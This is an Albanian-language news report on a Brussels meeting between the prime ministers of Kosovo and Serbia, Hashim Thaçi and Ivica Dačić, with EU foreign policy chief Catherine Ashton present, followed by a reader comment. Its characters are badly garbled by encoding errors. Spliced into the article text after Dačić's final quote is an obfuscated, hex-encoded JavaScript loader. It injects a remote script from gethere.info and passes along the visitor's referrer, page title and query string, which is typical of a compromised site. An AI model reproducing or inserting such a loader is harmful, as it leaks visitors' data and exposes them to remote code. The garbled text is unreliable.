largea_hashim-thaci-daciq-ashton1352332539

Diskutohet edhe pA�r veriun

NA� Bruksel ka pA�rfunduar takimi i dytA� i kryeministrit tA� KosovA�s Hashim ThaA�i dhe atij serb, Ivica DaA�iq, nA� prani tA� pA�rfaqA�sueses sA� lartA� pA�r PolitikA� tA� Jashtme dhe Siguri, tA� BE-sA�, Ketrin Eshton.

Eshton, paraprakisht ka pasur takime tA� ndara me tA� dy kryeministrat. Fillimisht me DaA�iqin e mA� pas edhe mA� ThaA�in, pA�rderisa mA� pas ka filluar takimi i pA�rbashkA�t, siA� A�shtA� quajtur darkA� pune.

NA� takim A�shtA� diskutuar edhe pA�r gjendjen nA� veri dhe mundA�sitA� e gjetjes sA� njA� konsensusi pA�r atA� pjesA� tA� vendit.

Edhe pse ende nuk ka pasur prononcime zyrtare, nga zyra e baroneshA�s Eshton raportohet se atmosfera kA�saj radhe ka qenA� mA� pozitive dhe konstruktive.

A�shtA� arritur pajtueshmA�ria e palA�ve pA�r fillimin e implementimit tA� marrA�veshjeve tA� arritura gjatA� dialogut teknik, e sidomos asaj pA�r menagjimin e integruar tA� kufirit.

a�?Ka pajtueshmA�ri qA� nA� dhjetor tA� filloj implementimi i marrA�veshjeve tA� arritura deri mA� tani kA�shtu qA� ekipet teknike do tA� nisin angazhimin e tyre nA� mA�nyrA� qA� gjendja nA� teren tA� ndryshoj, e sidomos nA� veria�?, ka thA�nA� kryeministri i KosovA�s, Hashim ThaA�i, pA�r televizionin publik tA� KosovA�s. Sipas tij, A�shtA� kA�rkuar bA�rja transparente e financimit tA� strukturave paralele nga Serbnia nA� KosovA� dhe ndalimi i kA�saj praktike.

DaA�iqi menjA�herA� pas takimit, pA�r mediat serbe, ka deklaruar se takimi ka qenA� mjaft i gjatA� dhe se ai ishte vazhdim i dialogut tA� filluar para disa javA�sh.

a�?Bisedimet ishin neutrale pA�rsa i pA�rket statusit dhe temat ishin gjetja e modaliteteve se si, ajo qA� A�shtA� arritur, tA� zbatoheta�?, ka thA�nA� DaA�iq.

Ai ka paralajmA�ruar qA� takimi i radhA�s me ThaA�in do tA� ndodh nA� fillim tA� dhjetorit.

Edhe kryeministri serb ka deklaruar se gjatA� takimit tA� sontA�m A�shtA� biseduar pA�r marrA�veshjet e arritura dhe pA�rmirA�simit tA� jetA�s sA� qytetarA�ve nA� KosovA�s si dhe pA�r kompetencat ekzekutive tA� EULEX-it nA� veri. Sipas tij, A�shtA� arritur pajtimi qA� gjatA� muajit tA� ardhshA�m tA� filloj zbatimi i marrA�veshjes, siA� e ka quajtur ai pA�r vendklaimet administrative.

DaA�iq ka thA�nA� se nga kryeministri ThaA�i ka marrA� premtime se do tA� formohet njA� njA�si policore, me pA�rbA�rje shumicA� serbe, e cila do ta��i ruaj manastiret serbe. Po, sipas tij, A�shtA� folur edhe pA�r autostradA�n Nish-PrishtinA�.

a�?Ky ishte njA� takim i mirA� dhe i dobishA�m dhe mendojA� se kemi bA�rA� disa hapa pA�rparaa�?, ka thA�nA� DaA�iq.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

  • AGIMI

    PO PËRDERISA JEM LIDHUR ME TË FORTIN MENDOJ SE AS HASHIM THAQI DHE ASNI LIDER TJETER SHQIPTAR NUK GUXON TJU IK SYXHERIMEV DHE VENDIMEV TË CILAT VIJN NGA AMERIKANET DHE ALEATËT E TIJ,PËRNDRYSHE MBETËM VETËM E VAJ HALLI……..
    KTU KEM TË BËJ ME SUPERFUQIT E JO ME SERBIN
    NËSE GABOJN SUPERFUQIT GABON EDHE LIDERI I YN
    DIALOGU ESHT ZGJEDHJE NDERSA MONOLOGU ESHT VETVRASJE